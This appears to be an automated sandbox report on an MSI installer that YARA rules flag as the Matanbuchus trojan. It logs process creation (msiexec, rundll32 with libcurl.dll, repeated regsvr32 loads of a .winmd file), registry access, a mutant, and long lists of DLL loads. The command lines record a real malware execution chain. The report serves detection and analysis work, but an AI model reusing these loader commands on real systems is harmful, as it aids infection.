Source: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
Source: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12

Source: classification engine

Classification label: mal92.troj.evad.winMSI@23/24@2/1

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\CMLF0AD.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Mutant created: \Sessions\1\BaseNamedObjects\8f08

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF31F7292E5E50E117.TMP

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\klog.php.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 7D4FE581FB47C85FAEE5D96881C26D11
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 7D4FE581FB47C85FAEE5D96881C26D11	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd"	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
